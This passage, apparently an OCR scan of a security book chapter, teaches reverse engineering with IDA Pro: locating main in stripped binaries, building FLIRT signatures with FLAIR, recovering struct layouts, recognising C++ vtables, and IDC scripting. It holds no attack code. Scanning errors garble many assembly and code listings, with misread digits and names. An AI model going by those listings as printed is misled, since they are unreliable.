belongs to libraries. However, as long as the statically linked program has not been 
stripped, you will continue to see all the same names that you would see in a dynami- 
cally linked version of the same program. A stripped, statically linked binary presents 
the largest challenge for reverse engineering. When the strip utility removes symbol 
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information from a statically linked program, it removes not only the function and 
global variable names associated with the program, but also the function and global 
variable names associated with any libraries that were linked in. As a result, it is 
extremely difficult to distinguish program code from library code in such a binary. 
Further, it is difficult to determine exactly how many libraries may have been linked 
into the program. IDA Pro has facilities (not well documented) for dealing with exactly 
this situation. 

Listing 21-3 shows what our _start function ends up looking like in a statically 
linked, stripped binary. 



Listing 2 1 -3 




start proc 


near 


xor 


ebp, ebp 


pop 


esi 


mov 


ecx, esp 


and 


esp, OFFFFFFFOh 


push 


eax 


push 


esp 


push 


edx 


push 


offset sub 8048AD4 


push 


offset sub 8048B10 


push 


ecx 


push 


esi 


push 


offset sub 8048208 


call 


sub_8048440 


start endp 





At this point, we have lost the names of every function in the binary and we need 
some method for locating the main function so that we can begin analyzing the pro- 
gram in earnest. Based on what we saw in Listings 21-1 and 21-2, we can proceed as 
follows: 



• Find the last function called from _start; this should be libc_start_main. 

• Locate the first argument to libc_start_main; this will be the topmost item 

on the stack, usually the last item pushed prior to the function call. In this 
case, we deduce that main must be sub_8048208. We are now prepared to 
start analyzing the program beginning with main. 

Locating main is only a small victory, however. By comparing Listing 21-4 from the 
unstripped version of the binary with Listing 21-5 from the stripped version, we can see 
that we have completely lost the ability to distinguish the boundaries between user 
code and library code. 

Listing 2 1 -4 

mov eax, stderr 

mov esp+250h+var_244 ] , eax 

mov [esp+250h+var_248 ] , 14h 

mov [esp+250h+var_24C] , 1 

mov esp+250h+var_250 ] , offset aUsageFetchHost ; "usage: fetch <host>\n" 

call fwrite 
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mov 

call 


[esp+250h+var 250] , 
exit 


1 


loc 804825F: ; 


CODE XREF : main+24 A j 


mov 


edx, [ebp-22Ch] 




mov 


eax, [edx+4] 




add 


eax, 4 




mov 


eax, [eax] 




mov 


[esp+250h+var 250] , 


eax 


call 


gethostbyname 




mov 


[ebp-lOh] , eax 




Listing 2 1 


-s 




mov 


eax, off 80BEBE4 




mov 


[esp+250h+var 244], 


eax 


mov 


[esp+250h+var 248], 


14h 


mov 


[esp+250h+var 24C] , 


1 


mov 


[esp+250h+var 250] , 


offset aUsageFetchHost ; "usage: 


call 


loc 8048F7C 




mov 


[esp+250h+var 250] , 


1 


call 


sub_8048BB0 




loc 804825F: 


CODE XREF: sub 8048208+24 A j 


mov 


edx, [ebp-22Ch] 




mov 


eax, [edx+4] 




add 


eax, 4 




mov 


eax, [eax] 




mov 


[esp+250h+var 250] , 


eax 


call 


loc 8052820 




mov 


[ebp-lOh] , eax 





fetch <host>\n" 



In Listing 21-5, we have lost the names of stderr, fwrite, exit, and gethostbyname, 
and each is indistinguishable from any other user space function or global variable. The 
danger we face is that, being presented with the binary from Listing 21-5, we might at- 
tempt to reverse-engineer the function at loc_8048F7C. Having done so, we would be 
disappointed to learn that we have done nothing more than reverse a piece of the C 
standard library. Clearly, this is not a desirable situation for us. Fortunately, IDA Pro 
possesses the ability to help out in these circumstances. 

Fast Library Identification and Recognition Technology (FLIRT) is the name that IDA Pro 
gives to its ability to automatically recognize functions based on pattern/signature 
matching. IDA Pro uses FLIRT to match code sequences against many signatures for 
widely used libraries. IDA Pro's initial use of FLIRT against any binary is to attempt to 
determine the compiler that was used to generate the binary. This is accomplished by 
matching entry point sequences (such as those we saw in Listings 21-1 through 21-3) 
against stored signatures for various compilers. Once the compiler has been identified, 

IDA Pro attempts to match against additional signatures more relevant to the identified 
compiler. In cases where IDA Pro does not pick up on the exact compiler that was used 
to create the binary, you can force IDA Pro to apply any additional signatures from IDA 
Pro's list of available signature files. Signature application takes place via the File | Load 
File | FLIRT Signature File menu option, which brings up the dialog box shown in 
Figure 21-1. 
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Figure 21-1 
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The dialog box is populated based on the contents of IDA Pro's sig subdirectory. 
Selecting one of the available signature sets causes IDA Pro to scan the current binary 
for possible matches. For each match that is found, IDA Pro renames the matching code 
in accordance with the signature. When the signature files are correct for the current 
binary, this operation has the effect of unstripping the binary. It is important to under- 
stand that IDA Pro does not come complete with signatures for every static library in 
existence. Consider the number of different libraries shipped with any Linux distribu- 
tion and you can appreciate the magnitude of this problem. To address this limitation, 
Hex-Rays ships a tool set called Fast Library Acquisition for Identification and Recognition 
(FLAIR). FLAIR consists of several command-line utilities used to parse static libraries 
and generate IDA Pro-compatible signature files. 

Generating IDA Pro Sig Files 

Installation of the FLAIR tools is as simple as unzipping the FLAIR distribution (flair51 
.zip used in this section) into a working directory. Beware that FLAIR distributions are 
generally not backward compatible with older versions of IDA Pro, so be sure to obtain 
the appropriate version of FLAIR for your version of IDA Pro from the Hex-Rays IDA 
Pro Downloads page (see "References"). After you have extracted the tools, you will 
find the entire body of existing FLAIR documentation in the three files named pat.txt, 
readme.txt, and sigmake.txt. You are encouraged to read through these files for more 
detailed information on creating your own signature files. 

The first step in creating signatures for a new library involves the extraction of pat- 
terns for each function in the library. FLAIR comes with pattern-generating parsers for 
several common static library file formats. All FLAIR tools are located in FLAIR's bin 
subdirectory. The pattern generators are named pXXX, where XXX represents various 
library file formats. In the following example, we will generate a sig file for the stati- 
cally linked version of the standard C library (libc.a) that ships with FreeBSD 6.2. After 
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moving libc.a onto our development system, the following command is used to gener- 
ate a pattern file: 

# ./pelf libc.a libc_FreeBSD62 .pat 
libc_FreeBSD62 .a: skipped 0, total 988 



We choose the pelf tool because FreeBSD uses ELF format binaries. In this case, we 
are working in FLAIR's bin directory. If you wish to work in another directory, the usual 
PATH issues apply for locating the pelf program. FLAIR pattern files are ASCII text files 
containing patterns for each exported function within the library being parsed. Patterns 
are generated from the first 32 bytes of a function, from some intermediate bytes of the 
function for which a CRC16 value is computed, and from the 32 bytes following the 
bytes used to compute the cyclic redundancy check (CRC). Pattern formats are de- 
scribed in more detail in the pat.txt file included with FLAIR. The second step in creat- 
ing a sig file is to use the sigmake tool to create a binary signature file from a generated 
pattern file. The following command attempts to generate a sig file from the previously 
generated pattern file: 

# .. /sigmake . exe -n"FreeBSD 6.2 standard C library" \ 

> libc_FreeBSD62 . pat libc_FreeBSD62 . sig 

See the documentation to learn how to resolve collisitions . 

: modules/leaves: 13443664/988, COLLISIONS: 924 

The -n option can be used to specify the "Library name" of the sig file as displayed 
in the sig file selection dialog box (see Figure 21-1). The default name assigned by sig- 
make is "Unnamed Sample Library." The last two arguments for sigmake represent the 
input pattern file and the output sig file, respectively. In this example, we seem to have 
a problem: sigmake is reporting some collisions. In a nutshell, collisions occur when 
two functions reduce to the same signature. If any collisions are found, sigmake refuses 
to generate a sig file and instead generates an exclusions (.exc) file. The first few lines of 
this particular exclusions file are shown here: 



; (delete these lines to allow sigmake to read this file) 

; add '+' at the start of a line to select a module 
; add if you are not sure about the selection 

; do nothing if you want to exclude all modules 



ntohs 00 0000 FB744240486C4C3 

htons 00 0000 FB744240486C4C3 

In this example, we see that the functions ntohs and htons have the same signature, 
which is not surprising considering that they do the same thing on an x86 architecture, 
namely swap the bytes in a 2-byte short value. The exclusions file must be edited to 
instruct sigmake how to resolve each collision. As shown earlier, basic instructions for 
this can be found in the generated .exc file. At a minimum, the comment lines (those 
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beginning with a semicolon) must be removed. You must then choose which, if any, of 
the colliding functions you wish to keep. In this example, if we choose to keep htons, 
we must prefix the htons line with a + character, which tells sigmake to treat any func- 
tion with the same signature as if it were htons rather than ntohs. More detailed in- 
structions on how to resolve collisions can be found in FLAIR's sigmake.txt file. Once 
you have edited the exclusions file, simply reran sigmake with the same options. A suc- 
cessful run will result in no error or warning messages and the creation of the requested 
sig file. Installing the newly created signature file is simply a matter of copying it to the 
sig subdirectory under your main IDA Pro program directory. The installed signatures 
will now be available for use, as shown in Figure 21-2. 

Applying the new signatures to the following code: 



text : 0804872C push 
text : 0804872D mov 
text : 0804872F sub 
text : 08048732 call 
text : 08048737 mov 
text : 0804873A call 
text : 0804873F mov 
text : 08048742 sub 
text : 08048745 mov 
text : 08048748 push 
text : 0804874B mov 
text : 0804874E push 
text : 08048750 call 
text : 08048755 add 



ebp 

ebp, esp 
esp, 18h 
sub__80593B0 
[ebp+var_4] , eax 
sub_805939C 
[ebp+var_8] , eax 
esp, 8 

eax, [ebp+arg_0] 
dword ptr [eax+OCh] 
eax, [ebp+arg_0] 
dword ptr [eax] 
sub_8057850 
esp, lOh 



Figure 21-2 
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yields the following improved disassembly in which we are far less likely to waste time 
analyzing any of the three functions that are called: 



text : 0804872C 


push 


ebp 


text :0804872D 


mov 


ebp, esp 


text : 0804872F 


sub 


esp, 18h 


text : 08048732 


call 


sys getuid 


text :08048737 


mov 


[ebp+var 4], eax 


text : 0804873A 


call 


sys getgid 


text : 0804873F 


mov 


[ebp+var 8], eax 


text :08048742 


sub 


esp, 8 


text : 08048745 


mov 


eax, [ebp+arg 0] 


text :08048748 


push 


dword ptr [eax+OCh] 


text : 0804874B 


mov 


eax, [ebp+arg 0] 


text : 0804 874E 


push 


dword ptr [eax] 


text : 08048750 


call 


initgroups 


text : 08048755 


add 


esp, lOh 



We have not covered how to identify exactly which static library files to use when 
generating your IDA Pro sig files. It is safe to assume that statically linked C programs 
are linked against the static C library. To generate accurate signatures, it is important to 
track down a version of the library that closely matches the one with which the binary 
was linked. Here, some file and strings analysis can assist in narrowing the field of 
operating systems that the binary may have been compiled on. The file utility can dis- 
tinguish among various platforms such as Linux, FreeBSD, and Mac OS X, and the 
strings utility can be used to search for version strings that may point to the compiler 
or libc version that was used. Armed with that information, you can attempt to locate 
the appropriate libraries from a matching system. If the binary was linked with more 
than one static library, additional strings analysis may be required to identify each ad- 
ditional library. Useful things to look for in strings output include copyright notices, 
version strings, usage instructions, or other unique messages that could be thrown into 
a search engine in an attempt to identify each additional library. By identifying as many 
libraries as possible and applying their signatures, you greatly reduce the amount of 
code that you need to spend time analyzing and get to focus more attention on appli- 
cation-specific code. 



Data Structure Analysis 

One consequence of compilation being a lossy operation is that we lose access to data 
declarations and structure definitions, which makes it far more difficult to understand 
the memory layout in disassembled code. As mentioned in Chapter 20, IDA Pro pro- 
vides the capability to define the layout of data structures and then to apply those 
structure definitions to regions of memory. Once a structure template has been applied 
to a region of memory, IDA Pro can utilize structure field names in place of integer 
offsets within the disassembly, making the disassembly far more readable. There are 
two important steps in determining the layout of data structures in compiled code. The 
first step is to determine the size of the data structure. The second step is to determine 
how the structure is subdivided into fields and what type is associated with each field. 

The program in Listing 21-6 and its corresponding compiled version in Listing 21-7 will 
be used to illustrate several points about disassembling structures. 
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Listing 2 1 -6 

1: #include <stdlib.h> 

2: #include <math.h> 

3: #include <string.h> 

4 : typedef struct GrayHat_t { 

5 : char buf [80] ; 

6: int val; 

7: double squareRoot; 

8: } GrayHat; 

9: int main (int argc, char **argv) { 

10: GrayHat gh; 

11: if (argc == 4) { 

12: GrayHat *g = (GrayHat* ) malloc (sizeof (GrayHat) ) ; 

13: strncpy (g->buf , argv[l], 80); 

14: g->val = atoi (argv [2 ] ) ; 

15: g->squareRoot = sqrt (atof (argv [3] ) ) ; 

16: strncpy (gh . buf , argv[0], 80); 

17: gh.val = Oxdeadbeef; 

18: } 

19: return 0; 

20 : } 



Listing 2 1 -7 



1 




; int 


cdecl main (int argc, const 


char **argv, const char *envp 


2 




main 


proc near 




3 




var 70 


= qword 


ptr -112 




4 




dest 


= byte ptr -96 




5 




var 10 


= dword 


ptr -16 




6 




argc 


= dword 


ptr 8 




7 




argv 


= dword 


ptr 12 




8 




envp 


= dword 


ptr 16 




9 






push 


ebp 




10 




mov 


ebp, esp 




11 




add 


esp, OFFFFFFAOh 




12 




push 


ebx 




13 




push 


esi 




14 




mov 


ebx, [ebp+argv] 




15 




cmp 


[ebp+argc] , 4 


argc != 4 


16 




j nz 


short loc 4011B6 




17 




push 


96 


struct size 


18 




call 


malloc 




19 




pop 


ecx 




20 




mov 


esi, eax ; 


esi points to struct 


21 




push 


80 


; maxlen 


22 




push 


dword ptr [ebx+4] 


; argv[l] 


23 




push 


esi 


; start of struct 


24 




call 


strncpy 




25 




add 


esp, OCh 




26 




push 


dword ptr [ebx+8] 


; argv [2] 


27 




call 


atol 




28 




pop 


ecx 




29 




mov 


[esi+80] , eax 


; 80 bytes into struct 


30 




push 


dword ptr [ebx+12 


] ; argv [3] 


31 




call 


atof 
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32 




pop 


ecx 




33 




add 


esp, 0FFFFFFF8h 




34 




f stp 


[esp+70h+var 70] 




35 




call 


sqrt 




36 




add 


esp, 8 




37 




f stp 


qword ptr [esi+88] ; 


88 bytes 


38 




push 


80 


maxlen 


39 




push 


dword ptr [ebx] 


argv [0] 


40 




lea 


eax, [ebp-96] 




41 




push 


eax 


dest 


42 




call 


strnepy 




43 




add 


esp, OCh 




44 




mov 


[ebp-16], ODEADBEEFh 




45 


loc 4011B6: 






46 




xor 


eax, eax 




47 




pop 


esi 




48 




pop 


ebx 




49 




mov 


esp, ebp 




50 




pop 


ebp 




51 




retn 






52 


main 


endp 







There are two methods for determining the size of a structure. The first and easiest 
method is to find locations at which a structure is dynamically allocated using malloc 
or new. Lines 17 and 18 in Listing 21-7 show a call to malloc 96 bytes of memory. 
Malloced blocks of memory generally represent either structures or arrays. In this case, 
we learn that this program manipulates a structure whose size is 96 bytes. The resulting 
pointer is transferred into the esi register and used to access the fields in the structure 
for the remainder of the function. References to this structure take place at lines 23, 29, 
and 37. 

The second method of determining the size of a structure is to observe the offsets 
used in every reference to the structure and to compute the maximum size required to 
house the data that is referenced. In this case, line 23 references the 80 bytes at the be- 
ginning of the structure (based on the maxlen argument pushed at line 21), line 29 
references 4 bytes (the size of eax) starting at offset 80 into the structure ([esi + 80]), 
and line 37 references 8 bytes (a quad word/qword) starting at offset 88 ([esi + 88]) 
into the structure. Based on these references, we can deduce that the structure is 88 (the 
maximum offset we observe) plus 8 (the size of data accessed at that offset), or 96 bytes 
long. Thus we have derived the size of the structure by two different methods. The 
second method is useful in cases where we can't directly observe the allocation of the 
structure, perhaps because it takes place within library code. 

To understand the layout of the bytes within a structure, we must determine the 
types of data that are used at each observable offset within the structure. In our example, 
the access at line 23 uses the beginning of the structure as the destination of a string 
copy operation, limited in size to 80 bytes. We can conclude therefore that the first 
80 bytes of the structure is an array of characters. At line 29, the 4 bytes at offset 80 in 
the structure are assigned the result of the function atol, which converts an ASCII string 
to a long value. Here we can conclude that the second field in the structure is a 4-byte 
long. Finally, at line 37, the 8 bytes at offset 88 into the structure are assigned the result 
of the function atof, which converts an ASCII string to a floating-point double value. 
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You may have noticed that the bytes at offsets 84-87 of the structure appear to be 
unused. There are two possible explanations for this. The first is that there is a structure 
field between the long and the double that is simply not referenced by the function. 
The second possibility is that the compiler has inserted some padding bytes to achieve 
some desired field alignment. Based on the actual definition of the structure in Listing 
21-6, we conclude that padding is the culprit in this particular case. If we wanted to see 
meaningful field names associated with each structure access, we could define a struc- 
ture in the IDA Pro Structures window, as described in Chapter 20. IDA Pro offers an 
alternative method for defining structures that you may find far easier to use than its 
structure editing facilities. IDA Pro can parse C header files via the File | Load File menu 
option. If you have access to the source code or prefer to create a C-style struct defini- 
tion using a text editor, IDA Pro will parse the header file and automatically create 
structures for each struct definition that it encounters in the header file. The only re- 
striction you must be aware of is that IDA Pro only recognizes standard C data types. 
For any nonstandard types, uint32_t, for example, the header file must contain an ap- 
propriate typedef, or you must edit the header file to convert all nonstandard types to 
standard types. 

Access to stack or globally allocated structures looks quite different from access to 
dynamically allocated structures. Listing 21-6 shows that main contains a local, stack 
allocated structure declared at line 10. Lines 16 and 17 of main reference fields in this 
local structure. These correspond to lines 40 and 44 in the assembly Listing 21-7. While 
we can see that line 44 references memory that is 80 bytes ([ebp-96+80] == [ebp-16]) 
after the reference at line 40, we don't get a sense that the two references belong to the 
same structure. This is because the compiler can compute the address of each field (as 
an absolute address in a global variable, or a relative address within a stack frame) at 
compile time, whereas access to fields in dynamically allocated structures must always 
be computed at runtime because the base address of the structure is not known at com- 
pile time. 

Using IDA Pro Structures to View Program Headers 

In addition to enabling you to declare your own data structures, IDA Pro contains a 
large number of common data structure templates for various build environments, in- 
cluding standard C library structures and Windows API structures. An interesting ex- 
ample use of these predefined structures is to use them to examine the program file 
headers which, by default, are not loaded into the analysis database. To examine file 
headers, you must perform a manual load when initially opening a file for analysis. 
Manual loads are selected via a checkbox on the initial load dialog box, as shown in 
Figure 21-3. 

Manual loading forces IDA Pro to ask you whether you wish to load each section of 
the binary into IDA Pro's database. One of the sections that IDA Pro will ask about is 
the header section, which will allow you to see all the fields of the program headers, 
including structures such as the MSDOS and NT file headers. Another section that gets 
loaded only when a manual load is performed is the resource section that is used on 
the Windows platform to store dialog box and menu templates, string tables, icons, and 
the file properties. You can view the fields of the MSDOS header by scrolling to the 
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Figure 21-3 
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beginning of a manually loaded Windows PE file and placing the cursor on the first 
address in the database, which should contain the 'M' value of the MSDOS 'MZ' signa- 
ture. No layout information will be displayed until you add the IMAGE_DOS_HEADER 
to your Structures window. This is accomplished by switching to the Structures tab, 
clicking Insert, entering IMAGE_DOS_HEADER as the Structure Name, as shown in 
Figure 21-4, and clicking OK. 

This will pull IDA Pro's definition of the IMAGE_DOS_HEADER from its type li- 
brary into your local Structures window and make it available to you. Finally, you 
need to return to the disassembly window, position the cursor on the first byte of the 
DOS header, and press alt-q to apply the IMAGE_DOS_HEADER template. The struc- 
ture may initially appear in its collapsed form, but you can view all of the struct fields 



Figure 21-4 

Importing the 
IPIAGE_DOS_ 
HEADER structure 



Create structure/union 
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by expanding the struct with the numeric keypad + key. This results in the display 
shown next: 



HEADER: 00400000 ImageBase 


dw 


5A4Dh 


e 


magic 


HEADER: 00400000 


dw 


50h 


e 


cblp 


HEADER: 00400000 


dw 


2 


e 


_cp 


HEADER: 00400000 


dw 


0 


e 


crlc 


HEADER: 00400000 


dw 


4 


e 


cparhdr 


HEADER: 00400000 


dw 


OFh 


e 


minalloc 


HEADER: 00400000 


dw 


OFFFFh 


e 


maxalloc 


HEADER: 00400000 


dw 


0 


e 


ss 


HEADER: 00400000 


dw 


0B8h 


e 


_sp 


HEADER: 00400000 


dw 


0 


e 


csum 


HEADER: 00400000 


dw 


0 


e 


_ip 


HEADER: 00400000 


dw 


0 


e 


cs 


HEADER: 00400000 


dw 


40h 


e 


lfarlc 


HEADER: 00400000 


dw 


lAh 


e 


ovno 


HEADER: 00400000 


dw 


4 dup ( 0 ) 


e 


res 


HEADER: 00400000 


dw 


0 


e 


oemid 


HEADER: 00400000 


dw 


0 


e 


oeminfo 


HEADER: 00400000 


dw 


OAh dup ( 0 ) 


e 


res2 


HEADER: 00400000 


dd 


200h 


e 


lfanew 



A little research on the contents of the DOS header will tell you that the ejfanew 
field holds the offset to the PE header struct. In this case, we can go to address 00400000 
+ 200h (00400200) and expect to find the PE header. The PE header fields can be 
viewed by repeating the process just described and using IMAGE_NT_HEADERS as the 
structure you wish to select and apply. 



Quirks of Compiled C++ Code 

C++ is a somewhat more complex language than C, offering member functions and 
polymorphism, among other things. These two features require implementation details 
that make compiled C++ code look rather different from compiled C code when they 
are used. First, all nonstatic member functions require a this pointer; and second, poly- 
morphism is implemented through the use of vtables. 




NOTE In C++, a this pointer is available in all nonstatic member functions. 
This points to the object for which the member function was called and 
allows a single function to operate on many different objects merely by 
providing different values for this each time the function is called. 



The means by which this pointers are passed to member functions vary from com- 
piler to compiler. Microsoft compilers take the address of the calling object and place it 
in the ecx register prior to calling a member function. Microsoft refers to this calling 
convention as a this call. Other compilers, such as Borland and g++, push the address of 
the calling object as the first (leftmost) parameter to the member function, effectively 
making this an implicit first parameter for all nonstatic member functions. C++ pro- 
grams compiled with Microsoft compilers are very recognizable as a result of their use 
of this call. Listing 21-8 shows a simple example. 
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Listing 21-8 

demo proc near 

this = dword ptr -4 

val = dword ptr 8 

push ebp 

mov ebp, esp 

push ecx 

mov [ebp+this] , ecx ; save this into a local variable 

mov eax, [ebp+this] 

mov ecx, [ebp+val] 

mov [eax] , ecx 

mov edx, [ebp+this] 

mov eax, [edx] 

mov esp, ebp 

pop ebp 

retn 4 

demo endp 

; int cdecl main(int argc, const char **argv, const char *envp) 

_main proc near 

x = dword ptr -8 

e = byte ptr -4 

argc = dword ptr 8 

argv = dword ptr OCh 

envp = dword ptr lOh 

push ebp 

mov ebp, esp 

sub esp, 8 

push 3 

lea ecx, [ebp+e] ; address of e loaded into ecx 

call demo ; demo must be a member function 

mov [ebp+x] , eax 

mov esp, ebp 

pop ebp 

retn 

_main endp 



Because Borland and g++ pass this as a regular stack parameter, their code tends to 
look more like traditional compiled C code and does not immediately stand out as 
compiled C++. 

C++ Vtables 

Virtual tables (vtables) are the mechanism underlying virtual functions and polymor- 
phism in C++. For each class that contains virtual member functions, the C++ compiler 
generates a table of pointers called a v table. A vtable contains an entry for each virtual 
function in a class, and the compiler fills each entry with a pointer to the virtual func- 
tion's implementation. Subclasses that override any virtual functions each receive their 
own vtable. The compiler copies the superclass's vtable, replacing the pointers of any 
functions that have been overridden with pointers to their corresponding subclass im- 
plementations. The following is an example of superclass and subclass vtables: 
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SuperVtable 



Subvtable 



dd 


offset 


fund 


dd 


offset 


func2 


dd 


offset 


func3 


dd 


offset 


func4 


dd 


offset 


func5 


dd 


offset 


func6 


dd 


offset 


fund 


dd 


offset 


func2 


dd 


offset 


sub 4010A8 


dd 


offset 


sub_4010C4 


dd 


offset 


func5 


dd 


offset 


func6 



DATA XREF: Super :: Super (void) 



DATA XREF: Sub :: Sub (void) 



As can be seen, the subclass overrides func3 and func4, but inherits the remaining 
virtual functions from its superclass. The following features of vtables make them stand 
out in disassembly listings: 

• Vtables are usually found in the read-only data section of a binary. 

• Vtables are referenced directly only from object constructors and destructors. 

• By examining similarities among vtables, it is possible to understand 
inheritance relationships among classes in a C++ program. 

• When a class contains virtual functions, all instances of that class will contain 
a pointer to the vtable as the first field within the object. This pointer is 
initialized in the class constructor. 

• Calling a virtual function is a three-step process. First, the vtable pointer must 
be read from the object. Second, the appropriate virtual function pointer 
must be read from the vtable. Finally, the virtual function can be called via 
the retrieved pointer. 



References 

FLIRT reference www.hex-rays.com/idapro/flirt.htm 

Hex-Rays IDA PRO Download page (FLAIR) www.hex-rays.com/idapro/idadown.htm 

Extending IDA Pm 

Although IDA Pro is an extremely powerful disassembler on its own, it is rarely possible 
for a piece of software to meet every need of its users. To provide as much flexibility as 
possible to its users, IDA Pro was designed with extensibility in mind. These features 
include a custom scripting language for automating simple tasks, and a plug-in archi- 
tecture that allows for more complex, compiled extensions. 

Scripting with IDC 

IDA Pro's scripting language is named IDC. IDC is a very C-like language that is inter- 
preted rather than compiled. Like many scripting languages, IDC is dynamically typed, 
and can be run in something close to an interactive mode, or as complete stand-alone 
scripts contained in .idc files. IDA Pro does provide some documentation on IDC in the 
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form of help files that describe the basic syntax of the language and the built-in API 
functions available to the IDC programmer. Like other IDA Pro documentation, what's 
available for IDC follows a rather minimalist approach, consisting primarily of com- 
ments from various IDC header files. Learning the IDC API generally requires browsing 
the IDC documentation until you discover a function that looks like it might do what 
you want, and then playing around with that function until you understand how it 
works. The following points offer a quick rundown of the IDC language: 

• IDC understands C++-style single- or multiline comments. 

• No explicit data types are in IDC. 

• No global variables are allowed in IDC script files. 

• If you require variables in your IDC scripts, they must be declared as the first 
lines of your script or the first lines within any function. 

• Variable declarations are introduced using the auto keyword: 

auto addr, j , k , val; 
auto min_ea, max_ea; 

• Function declarations are introduced with the static keyword. Functions have 
no explicit return type. Function argument declarations do not require the 
auto keyword. If you want to return a value from a function, simply return it. 

Different control paths can return different data types: 

static demoIdcFunc (val, addr) { 
if (addr > 0x4000000) { 

return addr + val; // return an int 

} 

else { 

return "Bad addr"; //return a string 

) 

} 

• IDC offers most C control structures, including if, while, for, and do. The 
break and continue statements are available within loops. There is no switch 
statement. As with C, all statements must terminate with a semicolon. C-style 
bracing with { and } is used. 

• Most C-style operators are available in IDC. Operators that are not available 
include += and all other operators of the form <op>=. 

• There is no array syntax available in IDC. Sparse arrays are implemented 
as named objects via the CreateArray, DeleteArray, SetArrayLong, 

SetArrayString, GetArrayElement, and GetArrayld functions. 

• Strings are a native data type in IDC. String concatenation is performed using 
the + operator, while string comparison is performed using the == operator. 

There is no character data type; instead, use strings of length one. 

• IDC understands the #define and #include directives. All IDC scripts executed 
from files must have the directive #include <idc.idc>. Interactive scripts need 
not include this file. 
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• IDC script files must contain a main function as follows: 

static main ( ) { 

//idc statements 

} 

Executing IDC Scripts 

There are two ways to execute an IDC script, both accessible via IDA Pro's File menu. 
The first method is to execute a stand-alone script using File | IDC File. This will bring 
up a File Open dialog box in which to select the desired script to run. A stand-alone 
script has the following basic structure: 

#include <idc.idc> //Mandatory include for standalone scripts 
/* 

* Other idc files may be #include'd if you have split your code 

* across several files. 

* 

* Standalone scripts can have no global variables, but can have 

* any number of functions. 

* 

* A standalone script must have a main function 
*/ 

static main ( ) { 

//statements for main, beginning with any variable declarations 

} 

The second method for executing IDC commands is to enter just the commands 
you wish to execute in a dialog box provided by IDA Pro via File | IDC Command. In 
this case, you must not enter any function declarations or #include directives. IDA Pro 
wraps the statements that you enter in a main function and executes them, so only 
statements that are legal within the body of a function are allowed here. Figure 21-5 
shows an example of the Hello World program implemented using File | IDC Com- 
mand. 

IDC Script Examples 

While there are many IDC functions available that provide access to your IDA Pro da- 
tabases, a few functions are relatively essential to know. These provide minimal access 
to read and write values in the database, output simple messages, and control the cur- 
sor location within the disassembly view. Byte(addr), Word(addr), and Dword(addr) 



Figure 21-5 
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read 1, 2, and 4 bytes, respectively, from the indicated address. PatchByte(addr, val), 
PatchWord(addr, val), and PatchDword(addr, val) patch 1, 2, and 4 bytes, respec- 
tively, at the indicated address. Note that the use of the PatchXXX functions changes 
only the IDA Pro database; they have no effect whatsoever on the original program 
binary. Message(format, . . . ) is similar to the C printf command, taking a format string 
and a variable number of arguments, and printing the result to the IDA Pro message 
window. If you want a carriage return, you must include it in your format string. Mes- 
sage provides the only debugging capability that IDC possesses, as no IDC debugger is 
available. Additional user interface functions are available that interact with a user 
through various dialog boxes. AskFile, AskYN, and AskStr can be used to display a file 
selection dialog box, a simple yes/no dialog box, and a simple one-line text input dia- 
log box, respectively. Finally, ScreenEAQ reads the address of the current cursor line, 
while Jump(addr) moves the cursor (and the display) to make addr the current address 
in the disassembly view. 

Scripts can prove useful in a wide variety of situations. Halvar Flake's BugScam vul- 
nerability scanner (see Chapter 20) is implemented as a set of IDC scripts. One situa- 
tion in which scripts come in very handy is for decoding data or code within a binary 
that may have been obfuscated in some way. Scripts are useful in this case to mimic the 
behavior of the program in order to avoid the need to run the program. Such scripts can 
be used to modify the database in much the same way that the program would modify 
itself if it were actually running. The following script demonstrates the implementation 
of a decoding loop using IDC to modify a database: 



so 

00 


decoding 


loop 


mov 


ecx, 


377 


mov 


esi. 


8049D2Eh 


mov 


edi. 


esi 



loc_804 9D01 : 
lodsb 

xor al, 4Bh 

stosb 

loop loc_8049D01 



//IDC Decoding loop 
auto i, addr, val; 
addr = 0x08049D2E; 
for (i = 0; i < 377; i++) { 
val = Byte (addr); 
val = val A 0x4B; 
PatchByte (addr, val) ; 
addr++; 

} 



IDA Pro Plug-In Modules and the IDA Pro SDK 

IDC is not suitable for all situations. IDC lacks the ability to define complex data struc- 
tures, perform efficient dynamic memory allocation, or access native programming 
APIs such as those in the C standard library or Windows API, and IDC does not provide 
access into the lowest levels of IDA Pro databases. Additionally, in cases where speed is 
required, IDC may not be the most suitable choice. For these situations, IDA Pro pro- 
vides an SDK (Software Development Kit) that publishes the C++ interface specifica- 
tions for the native IDA Pro API. 

The IDA Pro SDK enables the creation of compiled C++ plug-ins as extensions to 
IDA Pro. The SDK is included with recent IDA Pro distributions or is available as a 
separate download from the Hex-Rays website. A new SDK is released with each new 
version of IDA Pro, and it is imperative that you use a compatible SDK when creating 
plug-ins for your version of IDA Pro. Compiled plug-ins are generally compatible only 
with the version of IDA Pro that corresponds to the SDK with which the plug-in was 
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built. This can lead to problems when plug-in authors fail to provide new plug-in bina- 
ries for each new release of IDA Pro. As with other IDA Pro documentation, the SDK 
documentation is rather sparse. API documentation is limited to the supplied SDK 
header files, while documentation for compiling and installing plug-ins is limited to a 
few readme files. A great guide for learning to write plug-ins was published in 2005 by 
Steve Micallef, and covers build environment configuration as well as many useful API 
functions. His plug-in writing tutorial is a must read for anyone who wants to learn the 
nuts and bolts of IDA Pro plug-ins. See the "References" section at the end of the chap- 
ter for more details. 



Basic Plug-In Concept 

First, the plug-in API is published as a set of C++ header (.hpp) files in the SDK's in- 
clude directory. The contents of these files are the ultimate authority on what is or is not 
available to you in the IDA Pro SDK. There are two essential files that each plug-in must 
include: <ida.hpp> and <loader.hpp>. Ida.hpp defines the idainfo struct and the glob- 
al idainfo variable inf. The inf variable is populated with information about the cur- 
rent database, such as processor type, program entry point, minimum and maximum 
virtual address values, and much more. Plug-ins that are specific to a particular proces- 
sor or file format can examine the contents of the inf variable to learn whether they are 
compatible with the currently loaded file. Loader.hpp defines the plugin_t structure 
and contains the appropriate declaration to export a specific instance of a programmer- 
defined plugin_t. This is the single most important structure for plug-in authors, as it 
is mandatory to declare a single global plugin_t variable named PLUGIN. When a 
plug-in is loaded into IDA Pro, IDA Pro examines the exported PLUGIN variable to 
locate several function pointers that IDA Pro uses to initialize, execute, and terminate 
each plug-in. The plug-in structure is defined as follows: 



class plugin_t { 
public: 

int version; 
int flags; 

int (idaapi* init) (void) ; 



void (idaapi* term) (void) ; 



void (idaapi* run) (int arg) 



char * comment; 

char *help; 
char *wanted_name; 

char *wanted_hotkey; 



} ; 



// Set this to IDP_INTERFACE_VERSION 
// plugin attributes often set to 0 
// refer to loader.hpp for more info 
// plugin initialization function, called once for 
// each database that is loaded. Return value 
